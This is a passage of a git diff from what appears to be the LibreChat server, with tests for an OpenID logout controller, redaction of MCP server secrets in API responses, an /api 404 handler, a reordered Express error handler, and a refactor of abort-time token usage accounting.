||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toContain('id_token_hint=cookie-id-token');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('client_id fallback', () => {
|
||||||
|
it('falls back to client_id when no idToken is available', async () => {
|
||||||
|
cookies.parse.mockReturnValue({ refreshToken: 'cookie-rt' });
|
||||||
|
const req = buildReq({ session: { destroy: jest.fn() } });
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toContain('client_id=my-client-id');
|
||||||
|
expect(body.redirect).not.toContain('id_token_hint=');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('does not produce client_id=undefined when OPENID_CLIENT_ID is unset', async () => {
|
||||||
|
delete process.env.OPENID_CLIENT_ID;
|
||||||
|
cookies.parse.mockReturnValue({ refreshToken: 'cookie-rt' });
|
||||||
|
const req = buildReq({ session: { destroy: jest.fn() } });
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).not.toContain('client_id=');
|
||||||
|
expect(body.redirect).not.toContain('undefined');
|
||||||
|
expect(mockLogger.warn).toHaveBeenCalledWith(
|
||||||
|
expect.stringContaining('Neither id_token_hint nor OPENID_CLIENT_ID'),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('OPENID_USE_END_SESSION_ENDPOINT disabled', () => {
|
||||||
|
it('does not include redirect when disabled', async () => {
|
||||||
|
mockIsEnabled.mockReturnValue(false);
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toBeUndefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('OPENID_ISSUER unset', () => {
|
||||||
|
it('does not include redirect when OPENID_ISSUER is missing', async () => {
|
||||||
|
delete process.env.OPENID_ISSUER;
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toBeUndefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('non-OpenID user', () => {
|
||||||
|
it('does not include redirect for non-OpenID users', async () => {
|
||||||
|
const req = buildReq({
|
||||||
|
user: { _id: 'user1', provider: 'local' },
|
||||||
|
});
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toBeUndefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('post_logout_redirect_uri', () => {
|
||||||
|
it('uses OPENID_POST_LOGOUT_REDIRECT_URI when set', async () => {
|
||||||
|
process.env.OPENID_POST_LOGOUT_REDIRECT_URI = 'https://custom.example.com/logged-out';
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
const url = new URL(body.redirect);
|
||||||
|
expect(url.searchParams.get('post_logout_redirect_uri')).toBe(
|
||||||
|
'https://custom.example.com/logged-out',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('defaults to DOMAIN_CLIENT/login when OPENID_POST_LOGOUT_REDIRECT_URI is unset', async () => {
|
||||||
|
delete process.env.OPENID_POST_LOGOUT_REDIRECT_URI;
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
const url = new URL(body.redirect);
|
||||||
|
expect(url.searchParams.get('post_logout_redirect_uri')).toBe(
|
||||||
|
'https://app.example.com/login',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('OpenID config not available', () => {
|
||||||
|
it('warns and returns no redirect when getOpenIdConfig throws', async () => {
|
||||||
|
mockGetOpenIdConfig.mockImplementation(() => {
|
||||||
|
throw new Error('OpenID configuration has not been initialized');
|
||||||
|
});
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toBeUndefined();
|
||||||
|
expect(mockLogger.warn).toHaveBeenCalledWith(
|
||||||
|
expect.stringContaining('OpenID config not available'),
|
||||||
|
'OpenID configuration has not been initialized',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('end_session_endpoint not in metadata', () => {
|
||||||
|
it('warns and returns no redirect when end_session_endpoint is missing', async () => {
|
||||||
|
mockGetOpenIdConfig.mockReturnValue({
|
||||||
|
serverMetadata: () => ({}),
|
||||||
|
});
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toBeUndefined();
|
||||||
|
expect(mockLogger.warn).toHaveBeenCalledWith(
|
||||||
|
expect.stringContaining('end_session_endpoint not found'),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('error handling', () => {
|
||||||
|
it('returns 500 on logoutUser error', async () => {
|
||||||
|
mockLogoutUser.mockRejectedValue(new Error('session error'));
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(500);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({ message: 'session error' });
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('cookie clearing', () => {
|
||||||
|
it('clears all auth cookies on successful logout', async () => {
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
expect(res.clearCookie).toHaveBeenCalledWith('refreshToken');
|
||||||
|
expect(res.clearCookie).toHaveBeenCalledWith('openid_access_token');
|
||||||
|
expect(res.clearCookie).toHaveBeenCalledWith('openid_id_token');
|
||||||
|
expect(res.clearCookie).toHaveBeenCalledWith('openid_user_id');
|
||||||
|
expect(res.clearCookie).toHaveBeenCalledWith('token_provider');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -7,9 +7,11 @@
|
||||||
*/
|
*/
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const {
|
||||||
|
MCPErrorCodes,
|
||||||
|
redactServerSecrets,
|
||||||
|
redactAllServerSecrets,
|
||||||
isMCPDomainNotAllowedError,
|
isMCPDomainNotAllowedError,
|
||||||
isMCPInspectionFailedError,
|
isMCPInspectionFailedError,
|
||||||
MCPErrorCodes,
|
|
||||||
} = require('@librechat/api');
|
} = require('@librechat/api');
|
||||||
const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
|
const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
|
||||||
const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
|
const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
|
||||||
|
|
@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => {
|
||||||
return res.status(401).json({ message: 'Unauthorized' });
|
return res.status(401).json({ message: 'Unauthorized' });
|
||||||
}
|
}
|
||||||
|
|
||||||
// 2. Get all server configs from registry (YAML + DB)
|
|
||||||
const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
|
const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
|
||||||
|
return res.json(redactAllServerSecrets(serverConfigs));
|
||||||
return res.json(serverConfigs);
|
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('[getMCPServersList]', error);
|
logger.error('[getMCPServersList]', error);
|
||||||
res.status(500).json({ error: error.message });
|
res.status(500).json({ error: error.message });
|
||||||
|
|
@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => {
|
||||||
);
|
);
|
||||||
res.status(201).json({
|
res.status(201).json({
|
||||||
serverName: result.serverName,
|
serverName: result.serverName,
|
||||||
...result.config,
|
...redactServerSecrets(result.config),
|
||||||
});
|
});
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('[createMCPServer]', error);
|
logger.error('[createMCPServer]', error);
|
||||||
|
|
@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => {
|
||||||
return res.status(404).json({ message: 'MCP server not found' });
|
return res.status(404).json({ message: 'MCP server not found' });
|
||||||
}
|
}
|
||||||
|
|
||||||
res.status(200).json(parsedConfig);
|
res.status(200).json(redactServerSecrets(parsedConfig));
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('[getMCPServerById]', error);
|
logger.error('[getMCPServerById]', error);
|
||||||
res.status(500).json({ message: error.message });
|
res.status(500).json({ message: error.message });
|
||||||
|
|
@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => {
|
||||||
userId,
|
userId,
|
||||||
);
|
);
|
||||||
|
|
||||||
res.status(200).json(parsedConfig);
|
res.status(200).json(redactServerSecrets(parsedConfig));
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('[updateMCPServer]', error);
|
logger.error('[updateMCPServer]', error);
|
||||||
const mcpErrorResponse = handleMCPError(error, res);
|
const mcpErrorResponse = handleMCPError(error, res);
|
||||||
|
|
|
||||||
|
|
@ -14,6 +14,7 @@ const { logger } = require('@librechat/data-schemas');
|
||||||
const mongoSanitize = require('express-mongo-sanitize');
|
const mongoSanitize = require('express-mongo-sanitize');
|
||||||
const {
|
const {
|
||||||
isEnabled,
|
isEnabled,
|
||||||
|
apiNotFound,
|
||||||
ErrorController,
|
ErrorController,
|
||||||
performStartupChecks,
|
performStartupChecks,
|
||||||
handleJsonParseError,
|
handleJsonParseError,
|
||||||
|
|
@ -297,6 +298,7 @@ if (cluster.isMaster) {
|
||||||
/** Routes */
|
/** Routes */
|
||||||
app.use('/oauth', routes.oauth);
|
app.use('/oauth', routes.oauth);
|
||||||
app.use('/api/auth', routes.auth);
|
app.use('/api/auth', routes.auth);
|
||||||
|
app.use('/api/admin', routes.adminAuth);
|
||||||
app.use('/api/actions', routes.actions);
|
app.use('/api/actions', routes.actions);
|
||||||
app.use('/api/keys', routes.keys);
|
app.use('/api/keys', routes.keys);
|
||||||
app.use('/api/api-keys', routes.apiKeys);
|
app.use('/api/api-keys', routes.apiKeys);
|
||||||
|
|
@ -310,7 +312,6 @@ if (cluster.isMaster) {
|
||||||
app.use('/api/endpoints', routes.endpoints);
|
app.use('/api/endpoints', routes.endpoints);
|
||||||
app.use('/api/balance', routes.balance);
|
app.use('/api/balance', routes.balance);
|
||||||
app.use('/api/models', routes.models);
|
app.use('/api/models', routes.models);
|
||||||
app.use('/api/plugins', routes.plugins);
|
|
||||||
app.use('/api/config', routes.config);
|
app.use('/api/config', routes.config);
|
||||||
app.use('/api/assistants', routes.assistants);
|
app.use('/api/assistants', routes.assistants);
|
||||||
app.use('/api/files', await routes.files.initialize());
|
app.use('/api/files', await routes.files.initialize());
|
||||||
|
|
@ -324,8 +325,8 @@ if (cluster.isMaster) {
|
||||||
app.use('/api/tags', routes.tags);
|
app.use('/api/tags', routes.tags);
|
||||||
app.use('/api/mcp', routes.mcp);
|
app.use('/api/mcp', routes.mcp);
|
||||||
|
|
||||||
/** Error handler */
|
/** 404 for unmatched API routes */
|
||||||
app.use(ErrorController);
|
app.use('/api', apiNotFound);
|
||||||
|
|
||||||
/** SPA fallback - serve index.html for all unmatched routes */
|
/** SPA fallback - serve index.html for all unmatched routes */
|
||||||
app.use((req, res) => {
|
app.use((req, res) => {
|
||||||
|
|
@ -343,6 +344,9 @@ if (cluster.isMaster) {
|
||||||
res.send(updatedIndexHtml);
|
res.send(updatedIndexHtml);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
/** Error handler (must be last - Express identifies error middleware by its 4-arg signature) */
|
||||||
|
app.use(ErrorController);
|
||||||
|
|
||||||
/** Start listening on shared port (cluster will distribute connections) */
|
/** Start listening on shared port (cluster will distribute connections) */
|
||||||
app.listen(port, host, async (err) => {
|
app.listen(port, host, async (err) => {
|
||||||
if (err) {
|
if (err) {
|
||||||
|
|
|
||||||
|
|
@ -12,12 +12,14 @@ const { logger } = require('@librechat/data-schemas');
|
||||||
const mongoSanitize = require('express-mongo-sanitize');
|
const mongoSanitize = require('express-mongo-sanitize');
|
||||||
const {
|
const {
|
||||||
isEnabled,
|
isEnabled,
|
||||||
|
apiNotFound,
|
||||||
ErrorController,
|
ErrorController,
|
||||||
|
memoryDiagnostics,
|
||||||
performStartupChecks,
|
performStartupChecks,
|
||||||
handleJsonParseError,
|
handleJsonParseError,
|
||||||
initializeFileStorage,
|
|
||||||
GenerationJobManager,
|
GenerationJobManager,
|
||||||
createStreamServices,
|
createStreamServices,
|
||||||
|
initializeFileStorage,
|
||||||
} = require('@librechat/api');
|
} = require('@librechat/api');
|
||||||
const { connectDb, indexSync } = require('~/db');
|
const { connectDb, indexSync } = require('~/db');
|
||||||
const initializeOAuthReconnectManager = require('./services/initializeOAuthReconnectManager');
|
const initializeOAuthReconnectManager = require('./services/initializeOAuthReconnectManager');
|
||||||
|
|
@ -162,8 +164,10 @@ const startServer = async () => {
|
||||||
app.use('/api/tags', routes.tags);
|
app.use('/api/tags', routes.tags);
|
||||||
app.use('/api/mcp', routes.mcp);
|
app.use('/api/mcp', routes.mcp);
|
||||||
|
|
||||||
app.use(ErrorController);
|
/** 404 for unmatched API routes */
|
||||||
|
app.use('/api', apiNotFound);
|
||||||
|
|
||||||
|
/** SPA fallback - serve index.html for all unmatched routes */
|
||||||
app.use((req, res) => {
|
app.use((req, res) => {
|
||||||
res.set({
|
res.set({
|
||||||
'Cache-Control': process.env.INDEX_CACHE_CONTROL || 'no-cache, no-store, must-revalidate',
|
'Cache-Control': process.env.INDEX_CACHE_CONTROL || 'no-cache, no-store, must-revalidate',
|
||||||
|
|
@ -179,6 +183,9 @@ const startServer = async () => {
|
||||||
res.send(updatedIndexHtml);
|
res.send(updatedIndexHtml);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
/** Error handler (must be last - Express identifies error middleware by its 4-arg signature) */
|
||||||
|
app.use(ErrorController);
|
||||||
|
|
||||||
app.listen(port, host, async (err) => {
|
app.listen(port, host, async (err) => {
|
||||||
if (err) {
|
if (err) {
|
||||||
logger.error('Failed to start server:', err);
|
logger.error('Failed to start server:', err);
|
||||||
|
|
@ -201,6 +208,11 @@ const startServer = async () => {
|
||||||
const streamServices = createStreamServices();
|
const streamServices = createStreamServices();
|
||||||
GenerationJobManager.configure(streamServices);
|
GenerationJobManager.configure(streamServices);
|
||||||
GenerationJobManager.initialize();
|
GenerationJobManager.initialize();
|
||||||
|
|
||||||
|
const inspectFlags = process.execArgv.some((arg) => arg.startsWith('--inspect'));
|
||||||
|
if (inspectFlags || isEnabled(process.env.MEM_DIAG)) {
|
||||||
|
memoryDiagnostics.start();
|
||||||
|
}
|
||||||
});
|
});
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -100,6 +100,40 @@ describe('Server Configuration', () => {
|
||||||
expect(response.headers['expires']).toBe('0');
|
expect(response.headers['expires']).toBe('0');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return 404 JSON for undefined API routes', async () => {
|
||||||
|
const response = await request(app).get('/api/nonexistent');
|
||||||
|
expect(response.status).toBe(404);
|
||||||
|
expect(response.body).toEqual({ message: 'Endpoint not found' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 404 JSON for nested undefined API routes', async () => {
|
||||||
|
const response = await request(app).get('/api/nonexistent/nested/path');
|
||||||
|
expect(response.status).toBe(404);
|
||||||
|
expect(response.body).toEqual({ message: 'Endpoint not found' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 404 JSON for non-GET methods on undefined API routes', async () => {
|
||||||
|
const post = await request(app).post('/api/nonexistent');
|
||||||
|
expect(post.status).toBe(404);
|
||||||
|
expect(post.body).toEqual({ message: 'Endpoint not found' });
|
||||||
|
|
||||||
|
const del = await request(app).delete('/api/nonexistent');
|
||||||
|
expect(del.status).toBe(404);
|
||||||
|
expect(del.body).toEqual({ message: 'Endpoint not found' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 404 JSON for the /api root path', async () => {
|
||||||
|
const response = await request(app).get('/api');
|
||||||
|
expect(response.status).toBe(404);
|
||||||
|
expect(response.body).toEqual({ message: 'Endpoint not found' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should serve SPA HTML for non-API unmatched routes', async () => {
|
||||||
|
const response = await request(app).get('/this/does/not/exist');
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(response.headers['content-type']).toMatch(/html/);
|
||||||
|
});
|
||||||
|
|
||||||
it('should return 500 for unknown errors via ErrorController', async () => {
|
it('should return 500 for unknown errors via ErrorController', async () => {
|
||||||
// Testing the error handling here on top of unit tests to ensure the middleware is correctly integrated
|
// Testing the error handling here on top of unit tests to ensure the middleware is correctly integrated
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -1,17 +1,19 @@
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const {
|
||||||
countTokens,
|
|
||||||
isEnabled,
|
isEnabled,
|
||||||
sendEvent,
|
sendEvent,
|
||||||
|
countTokens,
|
||||||
GenerationJobManager,
|
GenerationJobManager,
|
||||||
|
recordCollectedUsage,
|
||||||
sanitizeMessageForTransmit,
|
sanitizeMessageForTransmit,
|
||||||
} = require('@librechat/api');
|
} = require('@librechat/api');
|
||||||
const { isAssistantsEndpoint, ErrorTypes } = require('librechat-data-provider');
|
const { isAssistantsEndpoint, ErrorTypes } = require('librechat-data-provider');
|
||||||
|
const { saveMessage, getConvo, updateBalance, bulkInsertTransactions } = require('~/models');
|
||||||
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
||||||
const { truncateText, smartTruncateText } = require('~/app/clients/prompts');
|
const { truncateText, smartTruncateText } = require('~/app/clients/prompts');
|
||||||
|
const { getMultiplier, getCacheMultiplier } = require('~/models/tx');
|
||||||
const clearPendingReq = require('~/cache/clearPendingReq');
|
const clearPendingReq = require('~/cache/clearPendingReq');
|
||||||
const { sendError } = require('~/server/middleware/error');
|
const { sendError } = require('~/server/middleware/error');
|
||||||
const { saveMessage, getConvo } = require('~/models');
|
|
||||||
const { abortRun } = require('./abortRun');
|
const { abortRun } = require('./abortRun');
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -27,62 +29,35 @@ const { abortRun } = require('./abortRun');
|
||||||
* @param {string} params.conversationId - Conversation ID
|
* @param {string} params.conversationId - Conversation ID
|
||||||
* @param {Array<Object>} params.collectedUsage - Usage metadata from all models
|
* @param {Array<Object>} params.collectedUsage - Usage metadata from all models
|
||||||
* @param {string} [params.fallbackModel] - Fallback model name if not in usage
|
* @param {string} [params.fallbackModel] - Fallback model name if not in usage
|
||||||
|
* @param {string} [params.messageId] - The response message ID for transaction correlation
|
||||||
*/
|
*/
|
||||||
async function spendCollectedUsage({ userId, conversationId, collectedUsage, fallbackModel }) {
|
async function spendCollectedUsage({
|
||||||
|
userId,
|
||||||
|
conversationId,
|
||||||
|
collectedUsage,
|
||||||
|
fallbackModel,
|
||||||
|
messageId,
|
||||||
|
}) {
|
||||||
if (!collectedUsage || collectedUsage.length === 0) {
|
if (!collectedUsage || collectedUsage.length === 0) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
const spendPromises = [];
|
await recordCollectedUsage(
|
||||||
|
{
|
||||||
for (const usage of collectedUsage) {
|
spendTokens,
|
||||||
if (!usage) {
|
spendStructuredTokens,
|
||||||
continue;
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
}
|
bulkWriteOps: { insertMany: bulkInsertTransactions, updateBalance },
|
||||||
|
},
|
||||||
// Support both OpenAI format (input_token_details) and Anthropic format (cache_*_input_tokens)
|
{
|
||||||
const cache_creation =
|
user: userId,
|
||||||
Number(usage.input_token_details?.cache_creation) ||
|
conversationId,
|
||||||
Number(usage.cache_creation_input_tokens) ||
|
collectedUsage,
|
||||||
0;
|
context: 'abort',
|
||||||
const cache_read =
|
messageId,
|
||||||
Number(usage.input_token_details?.cache_read) || Number(usage.cache_read_input_tokens) || 0;
|
model: fallbackModel,
|
||||||
|
|
||||||
const txMetadata = {
|
|
||||||
context: 'abort',
|
|
||||||
conversationId,
|
|
||||||
user: userId,
|
|
||||||
model: usage.model ?? fallbackModel,
|
|
||||||
};
|
|
||||||
|
|
||||||
if (cache_creation > 0 || cache_read > 0) {
|
|
||||||
spendPromises.push(
|
|
||||||
spendStructuredTokens(txMetadata, {
|
|
||||||
promptTokens: {
|
|
||||||
input: usage.input_tokens,
|
|
||||||
write: cache_creation,
|
|
||||||
read: cache_read,
|
|
||||||
},
|
},
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch((err) => {
|
|
||||||
logger.error('[abortMiddleware] Error spending structured tokens for abort', err);
|
|
||||||
}),
|
|
||||||
);
|
);
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
spendPromises.push(
|
|
||||||
spendTokens(txMetadata, {
|
|
||||||
promptTokens: usage.input_tokens,
|
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch((err) => {
|
|
||||||
logger.error('[abortMiddleware] Error spending tokens for abort', err);
|
|
||||||
}),
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
// Wait for all token spending to complete
|
|
||||||
await Promise.all(spendPromises);
|
|
||||||
|
|
||||||
// Clear the array to prevent double-spending from the AgentClient finally block.
|
// Clear the array to prevent double-spending from the AgentClient finally block.
|
||||||
// The collectedUsage array is shared by reference with AgentClient.collectedUsage,
|
// The collectedUsage array is shared by reference with AgentClient.collectedUsage,
|
||||||
|
|
@ -144,6 +119,7 @@ async function abortMessage(req, res) {
|
||||||
conversationId: jobData?.conversationId,
|
conversationId: jobData?.conversationId,
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
fallbackModel: jobData?.model,
|
fallbackModel: jobData?.model,
|
||||||
|
messageId: jobData?.responseMessageId,
|
||||||
});
|
});
|
||||||
} else {
|
} else {
|
||||||
// Fallback: no collected usage, use text-based token counting for primary model only
|
// Fallback: no collected usage, use text-based token counting for primary model only
|
||||||
|
|
@ -292,4 +268,5 @@ const handleAbortError = async (res, req, error, data) => {
|
||||||
module.exports = {
|
module.exports = {
|
||||||
handleAbort,
|
handleAbort,
|
||||||
handleAbortError,
|
handleAbortError,
|
||||||
|
spendCollectedUsage,
|
||||||
};
|
};
|
||||||
|
|
|
||||||
|
|
@ -4,16 +4,32 @@
|
||||||
* This tests the token spending logic for abort scenarios,
|
* This tests the token spending logic for abort scenarios,
|
||||||
* particularly for parallel agents (addedConvo) where multiple
|
* particularly for parallel agents (addedConvo) where multiple
|
||||||
* models need their tokens spent.
|
* models need their tokens spent.
|
||||||
|
*
|
||||||
|
* spendCollectedUsage delegates to recordCollectedUsage from @librechat/api,
|
||||||
|
* passing pricing + bulkWriteOps deps, with context: 'abort'.
|
||||||
|
* After spending, it clears the collectedUsage array to prevent double-spending
|
||||||
|
* from the AgentClient finally block (which shares the same array reference).
|
||||||
*/
|
*/
|
||||||
|
|
||||||
const mockSpendTokens = jest.fn().mockResolvedValue();
|
const mockSpendTokens = jest.fn().mockResolvedValue();
|
||||||
const mockSpendStructuredTokens = jest.fn().mockResolvedValue();
|
const mockSpendStructuredTokens = jest.fn().mockResolvedValue();
|
||||||
|
const mockRecordCollectedUsage = jest
|
||||||
|
.fn()
|
||||||
|
.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
|
|
||||||
|
const mockGetMultiplier = jest.fn().mockReturnValue(1);
|
||||||
|
const mockGetCacheMultiplier = jest.fn().mockReturnValue(null);
|
||||||
|
|
||||||
jest.mock('~/models/spendTokens', () => ({
|
jest.mock('~/models/spendTokens', () => ({
|
||||||
spendTokens: (...args) => mockSpendTokens(...args),
|
spendTokens: (...args) => mockSpendTokens(...args),
|
||||||
spendStructuredTokens: (...args) => mockSpendStructuredTokens(...args),
|
spendStructuredTokens: (...args) => mockSpendStructuredTokens(...args),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/tx', () => ({
|
||||||
|
getMultiplier: mockGetMultiplier,
|
||||||
|
getCacheMultiplier: mockGetCacheMultiplier,
|
||||||
|
}));
|
||||||
|
|
||||||
jest.mock('@librechat/data-schemas', () => ({
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
logger: {
|
logger: {
|
||||||
debug: jest.fn(),
|
debug: jest.fn(),
|
||||||
|
|
@ -30,6 +46,7 @@ jest.mock('@librechat/api', () => ({
|
||||||
GenerationJobManager: {
|
GenerationJobManager: {
|
||||||
abortJob: jest.fn(),
|
abortJob: jest.fn(),
|
||||||
},
|
},
|
||||||
|
recordCollectedUsage: mockRecordCollectedUsage,
|
||||||
sanitizeMessageForTransmit: jest.fn((msg) => msg),
|
sanitizeMessageForTransmit: jest.fn((msg) => msg),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
|
@ -49,94 +66,27 @@ jest.mock('~/server/middleware/error', () => ({
|
||||||
sendError: jest.fn(),
|
sendError: jest.fn(),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
const mockUpdateBalance = jest.fn().mockResolvedValue({});
|
||||||
|
const mockBulkInsertTransactions = jest.fn().mockResolvedValue(undefined);
|
||||||
jest.mock('~/models', () => ({
|
jest.mock('~/models', () => ({
|
||||||
saveMessage: jest.fn().mockResolvedValue(),
|
saveMessage: jest.fn().mockResolvedValue(),
|
||||||
getConvo: jest.fn().mockResolvedValue({ title: 'Test Chat' }),
|
getConvo: jest.fn().mockResolvedValue({ title: 'Test Chat' }),
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
bulkInsertTransactions: mockBulkInsertTransactions,
|
||||||
}));
|
}));
|
||||||
|
|
||||||
jest.mock('./abortRun', () => ({
|
jest.mock('./abortRun', () => ({
|
||||||
abortRun: jest.fn(),
|
abortRun: jest.fn(),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
// Import the module after mocks are set up
|
const { spendCollectedUsage } = require('./abortMiddleware');
|
||||||
// We need to extract the spendCollectedUsage function for testing
|
|
||||||
// Since it's not exported, we'll test it through the handleAbort flow
|
|
||||||
|
|
||||||
describe('abortMiddleware - spendCollectedUsage', () => {
|
describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
beforeEach(() => {
|
beforeEach(() => {
|
||||||
jest.clearAllMocks();
|
jest.clearAllMocks();
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('spendCollectedUsage logic', () => {
|
describe('spendCollectedUsage delegation', () => {
|
||||||
// Since spendCollectedUsage is not exported, we test the logic directly
|
|
||||||
// by replicating the function here for unit testing
|
|
||||||
|
|
||||||
const spendCollectedUsage = async ({
|
|
||||||
userId,
|
|
||||||
conversationId,
|
|
||||||
collectedUsage,
|
|
||||||
fallbackModel,
|
|
||||||
}) => {
|
|
||||||
if (!collectedUsage || collectedUsage.length === 0) {
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
const spendPromises = [];
|
|
||||||
|
|
||||||
for (const usage of collectedUsage) {
|
|
||||||
if (!usage) {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
const cache_creation =
|
|
||||||
Number(usage.input_token_details?.cache_creation) ||
|
|
||||||
Number(usage.cache_creation_input_tokens) ||
|
|
||||||
0;
|
|
||||||
const cache_read =
|
|
||||||
Number(usage.input_token_details?.cache_read) ||
|
|
||||||
Number(usage.cache_read_input_tokens) ||
|
|
||||||
0;
|
|
||||||
|
|
||||||
const txMetadata = {
|
|
||||||
context: 'abort',
|
|
||||||
conversationId,
|
|
||||||
user: userId,
|
|
||||||
model: usage.model ?? fallbackModel,
|
|
||||||
};
|
|
||||||
|
|
||||||
if (cache_creation > 0 || cache_read > 0) {
|
|
||||||
spendPromises.push(
|
|
||||||
mockSpendStructuredTokens(txMetadata, {
|
|
||||||
promptTokens: {
|
|
||||||
input: usage.input_tokens,
|
|
||||||
write: cache_creation,
|
|
||||||
read: cache_read,
|
|
||||||
},
|
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch(() => {
|
|
||||||
// Log error but don't throw
|
|
||||||
}),
|
|
||||||
);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
spendPromises.push(
|
|
||||||
mockSpendTokens(txMetadata, {
|
|
||||||
promptTokens: usage.input_tokens,
|
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch(() => {
|
|
||||||
// Log error but don't throw
|
|
||||||
}),
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
// Wait for all token spending to complete
|
|
||||||
await Promise.all(spendPromises);
|
|
||||||
|
|
||||||
